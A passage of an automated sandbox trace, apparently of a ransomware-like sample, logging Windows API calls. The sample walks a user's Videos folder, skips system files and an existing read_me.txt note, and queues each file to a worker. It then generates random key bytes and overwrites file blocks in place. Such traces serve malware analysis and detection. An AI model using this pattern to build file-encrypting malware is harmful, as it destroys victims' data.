lpSrch="autorun.inf") returned 0x0 [0078.574] StrStrW (lpFirst="4p0js35ljis1fy4ggt0.avi", lpSrch="ntuser.dat") returned 0x0 [0078.574] StrStrW (lpFirst="4p0js35ljis1fy4ggt0.avi", lpSrch="iconcache.db") returned 0x0 [0078.574] StrStrW (lpFirst="4p0js35ljis1fy4ggt0.avi", lpSrch="bootsect.bak") returned 0x0 [0078.574] StrStrW (lpFirst="4p0js35ljis1fy4ggt0.avi", lpSrch="boot.ini") returned 0x0 [0078.574] StrStrW (lpFirst="4p0js35ljis1fy4ggt0.avi", lpSrch="ntuser.dat.log") returned 0x0 [0078.574] StrStrW (lpFirst="4p0js35ljis1fy4ggt0.avi", lpSrch="thumbs.db") returned 0x0 [0078.574] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 182 [0078.574] QueueUserWorkItem (Function=0x404e00, Context=0x7e8, Flags=0x0) returned 1 [0078.574] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf04533a0, ftCreationTime.dwHighDateTime=0x1d4d121, ftLastAccessTime.dwLowDateTime=0x98c1e440, ftLastAccessTime.dwHighDateTime=0x1d4d1b0, ftLastWriteTime.dwLowDateTime=0x98c1e440, ftLastWriteTime.dwHighDateTime=0x1d4d1b0, nFileSizeHigh=0x0, nFileSizeLow=0x26f2, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="CaHQKOOzjSdnw.mp4", cAlternateFileName="CAHQKO~1.MP4")) returned 1 [0078.574] wnsprintfW (in: pszDest=0x8a80048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LeWhSQT\\CaHQKOOzjSdnw.mp4") returned 66 [0078.574] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LeWhSQT\\CaHQKOOzjSdnw.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\lewhsqt\\cahqkoozjsdnw.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7e4 [0078.574] StrStrW (lpFirst="cahqkoozjsdnw.mp4", lpSrch="read_me.txt") returned 0x0 [0078.574] StrStrW (lpFirst="cahqkoozjsdnw.mp4", lpSrch="autoexec.bat") returned 0x0 [0078.574] StrStrW (lpFirst="cahqkoozjsdnw.mp4", lpSrch="desktop.ini") returned 0x0 [0078.574] StrStrW (lpFirst="cahqkoozjsdnw.mp4", lpSrch="autorun.inf") returned 0x0 [0078.574] StrStrW (lpFirst="cahqkoozjsdnw.mp4", lpSrch="ntuser.dat") returned 0x0 [0078.574] StrStrW (lpFirst="cahqkoozjsdnw.mp4", lpSrch="iconcache.db") returned 0x0 [0078.575] StrStrW (lpFirst="cahqkoozjsdnw.mp4", lpSrch="bootsect.bak") returned 0x0 [0078.575] StrStrW (lpFirst="cahqkoozjsdnw.mp4", lpSrch="boot.ini") returned 0x0 [0078.575] StrStrW (lpFirst="cahqkoozjsdnw.mp4", lpSrch="ntuser.dat.log") returned 0x0 [0078.575] StrStrW (lpFirst="cahqkoozjsdnw.mp4", lpSrch="thumbs.db") returned 0x0 [0078.575] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 183 [0078.575] QueueUserWorkItem (Function=0x404e00, Context=0x7e4, Flags=0x0) returned 1 [0078.575] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x375a53f0, ftCreationTime.dwHighDateTime=0x1d4cfd4, ftLastAccessTime.dwLowDateTime=0x5e28c890, ftLastAccessTime.dwHighDateTime=0x1d4cb6a, ftLastWriteTime.dwLowDateTime=0x5e28c890, ftLastWriteTime.dwHighDateTime=0x1d4cb6a, nFileSizeHigh=0x0, nFileSizeLow=0x161ec, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="m6EAI.flv", cAlternateFileName="")) returned 1 [0078.575] wnsprintfW (in: pszDest=0x8a80048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LeWhSQT\\m6EAI.flv") returned 58 [0078.575] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LeWhSQT\\m6EAI.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\lewhsqt\\m6eai.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7e0 [0078.575] StrStrW (lpFirst="m6eai.flv", lpSrch="read_me.txt") returned 0x0 [0078.575] StrStrW (lpFirst="m6eai.flv", lpSrch="autoexec.bat") returned 0x0 [0078.575] StrStrW (lpFirst="m6eai.flv", lpSrch="desktop.ini") returned 0x0 [0078.575] StrStrW (lpFirst="m6eai.flv", lpSrch="autorun.inf") returned 0x0 [0078.575] StrStrW (lpFirst="m6eai.flv", lpSrch="ntuser.dat") returned 0x0 [0078.575] StrStrW (lpFirst="m6eai.flv", lpSrch="iconcache.db") returned 0x0 [0078.575] StrStrW (lpFirst="m6eai.flv", lpSrch="bootsect.bak") returned 0x0 [0078.575] StrStrW (lpFirst="m6eai.flv", lpSrch="boot.ini") returned 0x0 [0078.575] StrStrW (lpFirst="m6eai.flv", lpSrch="ntuser.dat.log") returned 0x0 [0078.575] StrStrW (lpFirst="m6eai.flv", lpSrch="thumbs.db") returned 0x0 [0078.575] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 184 [0078.576] QueueUserWorkItem (Function=0x404e00, Context=0x7e0, Flags=0x0) returned 1 [0078.576] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14e61450, ftCreationTime.dwHighDateTime=0x1d4ca0f, ftLastAccessTime.dwLowDateTime=0x79ebad00, ftLastAccessTime.dwHighDateTime=0x1d4c8f8, ftLastWriteTime.dwLowDateTime=0x79ebad00, ftLastWriteTime.dwHighDateTime=0x1d4c8f8, nFileSizeHigh=0x0, nFileSizeLow=0xef74, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="PkO5bkvD.avi", cAlternateFileName="")) returned 1 [0078.576] wnsprintfW (in: pszDest=0x8a80048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LeWhSQT\\PkO5bkvD.avi") returned 61 [0078.576] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LeWhSQT\\PkO5bkvD.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\lewhsqt\\pko5bkvd.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7d8 [0078.576] StrStrW (lpFirst="pko5bkvd.avi", lpSrch="read_me.txt") returned 0x0 [0078.576] StrStrW (lpFirst="pko5bkvd.avi", lpSrch="autoexec.bat") returned 0x0 [0078.576] StrStrW (lpFirst="pko5bkvd.avi", lpSrch="desktop.ini") returned 0x0 [0078.576] StrStrW (lpFirst="pko5bkvd.avi", lpSrch="autorun.inf") returned 0x0 [0078.576] StrStrW (lpFirst="pko5bkvd.avi", lpSrch="ntuser.dat") returned 0x0 [0078.576] StrStrW (lpFirst="pko5bkvd.avi", lpSrch="iconcache.db") returned 0x0 [0078.576] StrStrW (lpFirst="pko5bkvd.avi", lpSrch="bootsect.bak") returned 0x0 [0078.576] StrStrW (lpFirst="pko5bkvd.avi", lpSrch="boot.ini") returned 0x0 [0078.576] StrStrW (lpFirst="pko5bkvd.avi", lpSrch="ntuser.dat.log") returned 0x0 [0078.576] StrStrW (lpFirst="pko5bkvd.avi", lpSrch="thumbs.db") returned 0x0 [0078.576] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 185 [0078.576] QueueUserWorkItem (Function=0x404e00, Context=0x7d8, Flags=0x0) returned 1 [0078.576] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24dc9560, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24dc9560, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24dc9560, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0078.576] wnsprintfW (in: pszDest=0x8a80048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LeWhSQT\\read_me.txt") returned 60 [0078.576] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LeWhSQT\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\lewhsqt\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7dc [0078.577] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0078.577] CloseHandle (hObject=0x7dc) returned 1 [0078.577] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0968d20, ftCreationTime.dwHighDateTime=0x1d4d52e, ftLastAccessTime.dwLowDateTime=0x16622db0, ftLastAccessTime.dwHighDateTime=0x1d4d2ba, ftLastWriteTime.dwLowDateTime=0x16622db0, ftLastWriteTime.dwHighDateTime=0x1d4d2ba, nFileSizeHigh=0x0, nFileSizeLow=0x97d0, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="Rp2xQN71YX jTlH.mp4", cAlternateFileName="RP2XQN~1.MP4")) returned 1 [0078.577] wnsprintfW (in: pszDest=0x8a80048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LeWhSQT\\Rp2xQN71YX jTlH.mp4") returned 68 [0078.577] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LeWhSQT\\Rp2xQN71YX jTlH.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\lewhsqt\\rp2xqn71yx jtlh.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7dc [0078.577] StrStrW (lpFirst="rp2xqn71yx jtlh.mp4", lpSrch="read_me.txt") returned 0x0 [0078.577] StrStrW (lpFirst="rp2xqn71yx jtlh.mp4", lpSrch="autoexec.bat") returned 0x0 [0078.577] StrStrW (lpFirst="rp2xqn71yx jtlh.mp4", lpSrch="desktop.ini") returned 0x0 [0078.577] StrStrW (lpFirst="rp2xqn71yx jtlh.mp4", lpSrch="autorun.inf") returned 0x0 [0078.577] StrStrW (lpFirst="rp2xqn71yx jtlh.mp4", lpSrch="ntuser.dat") returned 0x0 [0078.577] StrStrW (lpFirst="rp2xqn71yx jtlh.mp4", lpSrch="iconcache.db") returned 0x0 [0078.577] StrStrW (lpFirst="rp2xqn71yx jtlh.mp4", lpSrch="bootsect.bak") returned 0x0 [0078.577] StrStrW (lpFirst="rp2xqn71yx jtlh.mp4", lpSrch="boot.ini") returned 0x0 [0078.577] StrStrW (lpFirst="rp2xqn71yx jtlh.mp4", lpSrch="ntuser.dat.log") returned 0x0 [0078.577] StrStrW (lpFirst="rp2xqn71yx jtlh.mp4", lpSrch="thumbs.db") returned 0x0 [0078.577] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 186 [0078.577] QueueUserWorkItem (Function=0x404e00, Context=0x7dc, Flags=0x0) returned 1 [0078.577] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbef4b310, ftCreationTime.dwHighDateTime=0x1d4d091, ftLastAccessTime.dwLowDateTime=0x75c64990, ftLastAccessTime.dwHighDateTime=0x1d4cec7, ftLastWriteTime.dwLowDateTime=0x75c64990, ftLastWriteTime.dwHighDateTime=0x1d4cec7, nFileSizeHigh=0x0, nFileSizeLow=0x66ca, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="Xx vJjBJEj e7O3gHCh.flv", cAlternateFileName="XXVJJB~1.FLV")) returned 1 [0078.577] wnsprintfW (in: pszDest=0x8a80048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LeWhSQT\\Xx vJjBJEj e7O3gHCh.flv") returned 72 [0078.578] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LeWhSQT\\Xx vJjBJEj e7O3gHCh.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\lewhsqt\\xx vjjbjej e7o3ghch.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7d4 [0078.578] StrStrW (lpFirst="xx vjjbjej e7o3ghch.flv", lpSrch="read_me.txt") returned 0x0 [0078.578] StrStrW (lpFirst="xx vjjbjej e7o3ghch.flv", lpSrch="autoexec.bat") returned 0x0 [0078.578] StrStrW (lpFirst="xx vjjbjej e7o3ghch.flv", lpSrch="desktop.ini") returned 0x0 [0078.578] StrStrW (lpFirst="xx vjjbjej e7o3ghch.flv", lpSrch="autorun.inf") returned 0x0 [0078.578] StrStrW (lpFirst="xx vjjbjej e7o3ghch.flv", lpSrch="ntuser.dat") returned 0x0 [0078.578] StrStrW (lpFirst="xx vjjbjej e7o3ghch.flv", lpSrch="iconcache.db") returned 0x0 [0078.578] StrStrW (lpFirst="xx vjjbjej e7o3ghch.flv", lpSrch="bootsect.bak") returned 0x0 [0078.578] StrStrW (lpFirst="xx vjjbjej e7o3ghch.flv", lpSrch="boot.ini") returned 0x0 [0078.578] StrStrW (lpFirst="xx vjjbjej e7o3ghch.flv", lpSrch="ntuser.dat.log") returned 0x0 [0078.578] StrStrW (lpFirst="xx vjjbjej e7o3ghch.flv", lpSrch="thumbs.db") returned 0x0 [0078.578] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 187 [0078.578] QueueUserWorkItem (Function=0x404e00, Context=0x7d4, Flags=0x0) returned 1 [0078.578] FindNextFileW (in: hFindFile=0x7cfe768, lpFindFileData=0x758fb60 | out: lpFindFileData=0x758fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbef4b310, ftCreationTime.dwHighDateTime=0x1d4d091, ftLastAccessTime.dwLowDateTime=0x75c64990, ftLastAccessTime.dwHighDateTime=0x1d4cec7, ftLastWriteTime.dwLowDateTime=0x75c64990, ftLastWriteTime.dwHighDateTime=0x1d4cec7, nFileSizeHigh=0x0, nFileSizeLow=0x66ca, dwReserved0=0x7d778b0, dwReserved1=0x4f10000, cFileName="xx vjjbjej e7o3ghch.flv", cAlternateFileName="XXVJJB~1.FLV")) returned 0 [0078.578] FindClose (in: hFindFile=0x7cfe768 | out: hFindFile=0x7cfe768) returned 1 [0078.578] wnsprintfW (in: pszDest=0x8a80048, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LeWhSQT\\read_me.txt") returned 60 [0078.578] GetProcessHeap () returned 0x4f10000 [0078.578] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a80048 | out: hHeap=0x4f10000) returned 1 [0078.578] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 88 [0078.578] GetProcessHeap () returned 0x4f10000 [0078.579] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8e11118 | out: hHeap=0x4f10000) returned 1 [0078.754] SetFilePointerEx (in: hFile=0x810, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.754] ReadFile (in: hFile=0x810, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0078.754] SetFilePointerEx (in: hFile=0x810, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.754] GetProcessHeap () returned 0x4f10000 [0078.754] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0078.754] GetProcessHeap () returned 0x4f10000 [0078.754] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0078.754] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0078.754] GetProcessHeap () returned 0x4f10000 [0078.754] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0078.754] ReadFile (in: hFile=0x810, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0078.827] SetFilePointerEx (in: hFile=0x810, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.827] WriteFile (in: hFile=0x810, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0078.828] GetProcessHeap () returned 0x4f10000 [0078.828] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0078.828] GetProcessHeap () returned 0x4f10000 [0078.828] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0078.828] GetProcessHeap () returned 0x4f10000 [0078.828] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0078.828] GetProcessHeap () returned 0x4f10000 [0078.828] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0078.828] GetProcessHeap () returned 0x4f10000 [0078.828] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0078.828] GetProcessHeap () returned 0x4f10000 [0078.828] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0078.828] GetProcessHeap () returned 0x4f10000 [0078.828] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.828] GetProcessHeap () returned 0x4f10000 [0078.828] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.828] GetProcessHeap () returned 0x4f10000 [0078.828] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.828] GetProcessHeap () returned 0x4f10000 [0078.828] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.828] GetProcessHeap () returned 0x4f10000 [0078.828] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.828] GetProcessHeap () returned 0x4f10000 [0078.828] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.828] GetProcessHeap () returned 0x4f10000 [0078.828] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.828] GetProcessHeap () returned 0x4f10000 [0078.828] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.828] GetProcessHeap () returned 0x4f10000 [0078.828] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.828] GetProcessHeap () returned 0x4f10000 [0078.828] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.829] GetProcessHeap () returned 0x4f10000 [0078.829] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.829] GetProcessHeap () returned 0x4f10000 [0078.829] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.829] GetProcessHeap () returned 0x4f10000 [0078.829] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.829] GetProcessHeap () returned 0x4f10000 [0078.829] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.829] GetProcessHeap () returned 0x4f10000 [0078.829] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.829] GetProcessHeap () returned 0x4f10000 [0078.829] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.829] GetProcessHeap () returned 0x4f10000 [0078.829] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.829] GetProcessHeap () returned 0x4f10000 [0078.829] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.829] GetProcessHeap () returned 0x4f10000 [0078.829] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.829] GetProcessHeap () returned 0x4f10000 [0078.829] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.829] GetProcessHeap () returned 0x4f10000 [0078.829] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.829] GetProcessHeap () returned 0x4f10000 [0078.829] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.829] GetProcessHeap () returned 0x4f10000 [0078.829] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.829] GetProcessHeap () returned 0x4f10000 [0078.829] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.829] GetProcessHeap () returned 0x4f10000 [0078.829] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.829] GetProcessHeap () returned 0x4f10000 [0078.829] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.829] GetProcessHeap () returned 0x4f10000 [0078.829] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.829] GetProcessHeap () returned 0x4f10000 [0078.829] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.829] GetProcessHeap () returned 0x4f10000 [0078.829] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0078.829] GetProcessHeap () returned 0x4f10000 [0078.830] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.830] GetProcessHeap () returned 0x4f10000 [0078.830] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0078.830] GetProcessHeap () returned 0x4f10000 [0078.830] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0078.830] GetProcessHeap () returned 0x4f10000 [0078.830] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0078.830] GetProcessHeap () returned 0x4f10000 [0078.830] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0078.830] GetProcessHeap () returned 0x4f10000 [0078.830] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0078.830] GetProcessHeap () returned 0x4f10000 [0078.830] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0078.830] GetProcessHeap () returned 0x4f10000 [0078.830] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0078.830] GetProcessHeap () returned 0x4f10000 [0078.830] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0078.830] GetProcessHeap () returned 0x4f10000 [0078.830] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0078.830] GetProcessHeap () returned 0x4f10000 [0078.830] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0078.830] GetProcessHeap () returned 0x4f10000 [0078.830] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.830] GetProcessHeap () returned 0x4f10000 [0078.830] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0078.830] GetProcessHeap () returned 0x4f10000 [0078.830] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.830] GetProcessHeap () returned 0x4f10000 [0078.830] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.830] GetProcessHeap () returned 0x4f10000 [0078.830] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.830] GetProcessHeap () returned 0x4f10000 [0078.830] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.831] GetProcessHeap () returned 0x4f10000 [0078.831] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.831] GetProcessHeap () returned 0x4f10000 [0078.831] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.831] GetProcessHeap () returned 0x4f10000 [0078.831] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.831] GetProcessHeap () returned 0x4f10000 [0078.831] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.831] GetProcessHeap () returned 0x4f10000 [0078.831] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.831] GetProcessHeap () returned 0x4f10000 [0078.831] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0078.831] GetProcessHeap () returned 0x4f10000 [0078.831] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0078.831] GetProcessHeap () returned 0x4f10000 [0078.831] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0078.831] GetProcessHeap () returned 0x4f10000 [0078.831] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0078.831] 